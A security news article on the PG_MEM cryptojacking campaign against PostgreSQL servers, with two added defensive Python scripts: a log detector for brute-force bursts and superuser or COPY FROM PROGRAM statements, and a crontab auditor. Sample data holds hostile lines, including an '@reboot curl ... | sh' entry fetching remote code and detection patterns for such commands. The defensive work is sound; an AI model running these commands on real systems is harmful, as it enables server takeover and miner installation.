Researchers at Aqua Nautilus have identified a new malware targeting PostgreSQL servers to deploy cryptocurrency miners.
The cybersecurity firm has flagged over 800,000 servers as potentially vulnerable to a cryptojacking campaign focusing on PostgreSQL, an open-source relational database management system used to store, manage, and retrieve data for various applications.
According to the research report, the malware, dubbed "PG_MEM", brute-forces PostgreSQL logins that are protected by weak passwords. Once it has a working login, it creates a new role with SUPERUSER privileges, taking full control of the database and locking other users out. No separate exploit is needed from that point: a PostgreSQL superuser can run operating-system commands on the database host through built-in server features (for example COPY ... FROM PROGRAM), and the malware uses that to download and execute additional payloads.
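The two stages described above, a brute-force burst followed by superuser role changes and OS command execution, both leave traces in the PostgreSQL server log. The following detector is an added example written for this page, not code from Aqua Nautilus or the PostgreSQL project. It assumes the server logs with log_line_prefix = '%m [%p] %r ' (timestamp, PID, remote host:port) and log_statement = 'mod', so that authentication failures, role DDL and COPY FROM statements appear in the log; the log lines, role names and IP addresses below are constructed sample data.

```python
"""Flag brute-force login bursts and superuser/OS-command statements in PostgreSQL logs.

Added example for this article (not the report's or PostgreSQL's code).
Assumes log_line_prefix = '%m [%p] %r ' and log_statement = 'mod'.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# One log line: "<timestamp> <tz> [<pid>] <host>(<port>) <LEVEL>:  <message>"
# The host(port) part is empty for server-internal processes such as the checkpointer.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+ \w+ \[(?P<pid>\d+)\]"
    r"(?: (?P<host>[^\s(]+)\(\d+\))?\s*(?P<level>[A-Z]+):\s+(?P<msg>.*)$"
)
AUTH_FAIL_RE = re.compile(r'^password authentication failed for user "(?P<user>[^"]+)"')
STMT_RE = re.compile(r"^statement:\s+(?P<sql>.*)$")

# Statement patterns worth alerting on once a login has succeeded.
# \bSUPERUSER\b deliberately does not match inside NOSUPERUSER.
SUSPICIOUS_SQL = [
    ("superuser_grant", re.compile(r"\b(CREATE|ALTER)\s+(ROLE|USER)\b.*\bSUPERUSER\b", re.I)),
    ("superuser_revoke", re.compile(r"\bALTER\s+(ROLE|USER)\b.*\bNOSUPERUSER\b", re.I)),
    ("os_command", re.compile(r"\bCOPY\b.*\bFROM\s+PROGRAM\b", re.I)),
]

# Constructed sample log (not real data): six failures from one host in 12 seconds,
# one unrelated failure, then a successful login that creates a superuser role,
# demotes an existing role and runs a shell command via COPY ... FROM PROGRAM.
SAMPLE_LOG = """\
2024-08-20 10:00:01.100 UTC [1201] 203.0.113.7(51234) FATAL:  password authentication failed for user "postgres"
2024-08-20 10:00:03.100 UTC [1202] 203.0.113.7(51235) FATAL:  password authentication failed for user "postgres"
2024-08-20 10:00:05.100 UTC [1203] 203.0.113.7(51236) FATAL:  password authentication failed for user "postgres"
2024-08-20 10:00:07.100 UTC [1204] 198.51.100.9(40001) FATAL:  password authentication failed for user "app_user"
2024-08-20 10:00:09.100 UTC [1205] 203.0.113.7(51237) FATAL:  password authentication failed for user "postgres"
2024-08-20 10:00:11.100 UTC [1206] 203.0.113.7(51238) FATAL:  password authentication failed for user "postgres"
2024-08-20 10:00:13.100 UTC [1207] 203.0.113.7(51239) FATAL:  password authentication failed for user "postgres"
2024-08-20 10:00:15.100 UTC [1208] 203.0.113.7(51240) LOG:  connection authorized: user=postgres database=postgres
2024-08-20 10:00:16.100 UTC [1208] 203.0.113.7(51240) LOG:  statement: CREATE ROLE svc_maint WITH SUPERUSER LOGIN
2024-08-20 10:00:17.100 UTC [1208] 203.0.113.7(51240) LOG:  statement: ALTER ROLE app_user NOSUPERUSER
2024-08-20 10:00:18.100 UTC [1208] 203.0.113.7(51240) LOG:  statement: COPY scratch FROM PROGRAM 'id'
2024-08-20 10:00:20.100 UTC [900] LOG:  checkpoint starting: time
"""


def analyse(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {'brute_force': [...], 'suspicious_sql': [...]} for the given log text.

    A host is reported once when it reaches `threshold` failed password logins
    inside a sliding `window`; every suspicious statement is reported individually.
    """
    failures = defaultdict(deque)  # host -> timestamps of recent failures
    alerted = set()
    findings = {"brute_force": [], "suspicious_sql": []}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # continuation lines (DETAIL:, HINT:) and unknown formats
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        host = m["host"] or "local"
        msg = m["msg"]
        if m["level"] == "FATAL" and AUTH_FAIL_RE.match(msg):
            recent = failures[host]
            recent.append(ts)
            while recent and ts - recent[0] > window:
                recent.popleft()  # drop failures that fell out of the window
            if len(recent) >= threshold and host not in alerted:
                alerted.add(host)
                findings["brute_force"].append(
                    {"host": host, "count": len(recent), "first": recent[0], "last": ts}
                )
            continue
        stmt = STMT_RE.match(msg)
        if m["level"] == "LOG" and stmt:
            for tag, rx in SUSPICIOUS_SQL:
                if rx.search(stmt["sql"]):
                    findings["suspicious_sql"].append({"host": host, "tag": tag, "sql": stmt["sql"]})
    return findings


if __name__ == "__main__":
    for kind, items in analyse(SAMPLE_LOG).items():
        for item in items:
            print(kind, item)
```

The brute-force rule alerts once per host when the threshold is crossed rather than on every subsequent failure, which keeps a sustained attack from flooding the alert queue; the statement rules fire on the successful session that follows, so correlating the two findings on the same host is the signal that the brute force actually worked.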
The payloads include two files designed to evade detection, set up the system for cryptocurrency mining, and deploy the XMRIG mining tool used to mine Monero. XMRIG is frequently used by threat actors due to Monero's hard-to-trace transactions.
Last year, an educational platform was compromised in a cryptojacking campaign where attackers deployed a hidden script that installed XMRIG on every visitor's system.
Analysts found that the malware removes existing cron jobs, which are scheduled tasks that run automatically at specified intervals on a server, and creates new ones to ensure that the crypto miner continues to run. This lets the miner persist across reboots and restart if its process is killed. To remain unnoticed, the malware deletes specific files and logs that could be used to track or identify its activities on the server.
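Because the persistence step both removes legitimate cron jobs and adds new ones, the practical check is to diff the live crontab against a known-good baseline and score whatever was added. The following audit script is an added example for this article, not code from the report or from any cron implementation. It parses the `crontab -l` format (user crontabs, not the /etc/crontab variant with a user column), and the baseline, the live crontab, the paths and the download URL in it are constructed sample data.

```python
"""Diff a live user crontab against a baseline and flag persistence indicators.

Added example for this article (not the report's code). Sample crontabs are constructed.
"""
import re

# Command-line indicators commonly seen in miner persistence; each is a heuristic, not proof.
INDICATORS = {
    "download_piped_to_shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|da|z)?sh\b"),
    "world_writable_dir": re.compile(r"(^|[\s=])(/tmp|/var/tmp|/dev/shm)/"),
    "hidden_path": re.compile(r"/\.[^/\s]+"),          # a dot-prefixed path component
    "output_silenced": re.compile(r">\s*/dev/null"),
}

# Constructed baseline: what an administrator expects to be scheduled on this host.
BASELINE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/pg_backup.sh
*/5 * * * * /usr/lib/nagios/plugins/check_disk
"""

# Constructed live crontab after a compromise of the kind described above:
# the legitimate jobs are gone and two new entries re-launch a payload.
LIVE_CRONTAB = """\
*/1 * * * * /tmp/.x/run.sh >/dev/null 2>&1
@reboot curl -s http://203.0.113.50/p.sh | sh
"""


def parse_crontab(text):
    """Return a list of (schedule, command) tuples; comments, blanks and VAR=value lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):                    # @reboot, @daily, ...
            sched, _, cmd = line.partition(" ")
        else:                                       # five time fields, then the command
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        entries.append((sched, cmd.strip()))
    return entries


def score_entry(sched, cmd):
    """Return the list of indicator names that apply to one crontab entry."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    if sched == "@reboot":
        hits.append("runs_at_reboot")
    elif sched.split()[0] in ("*", "*/1"):
        hits.append("runs_every_minute")            # typical of a watchdog that respawns a miner
    return hits


def audit_cron(baseline_text, live_text):
    """Diff live against baseline; report removed jobs and added jobs with their indicators."""
    baseline = parse_crontab(baseline_text)
    live = parse_crontab(live_text)
    baseline_set, live_set = set(baseline), set(live)
    return {
        "removed": [e for e in baseline if e not in live_set],
        "added": [
            {"schedule": s, "command": c, "indicators": score_entry(s, c)}
            for s, c in live if (s, c) not in baseline_set
        ],
    }


if __name__ == "__main__":
    report = audit_cron(BASELINE_CRONTAB, LIVE_CRONTAB)
    for sched, cmd in report["removed"]:
        print("REMOVED:", sched, cmd)
    for entry in report["added"]:
        print("ADDED:", entry["schedule"], entry["command"], entry["indicators"])
```

Removed entries matter as much as added ones here: a backup or monitoring job silently disappearing is often the first visible symptom, and it is exactly the behaviour the article describes. Run the same diff against /etc/cron.d and the systemd timer list, since the baseline approach is the same for any scheduler.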
The researchers warned that while the primary goal of the campaign is to deploy the cryptocurrency miner, attackers also gain control of the affected server, underscoring the severity of the threat.
Cryptojacking campaigns targeting PostgreSQL databases have been a recurring threat over the years. In 2020, researchers uncovered a similar cryptojacking campaign involving the PgMiner botnet. In 2018, the StickyDB botnet was discovered, which also infiltrated servers to mine Monero.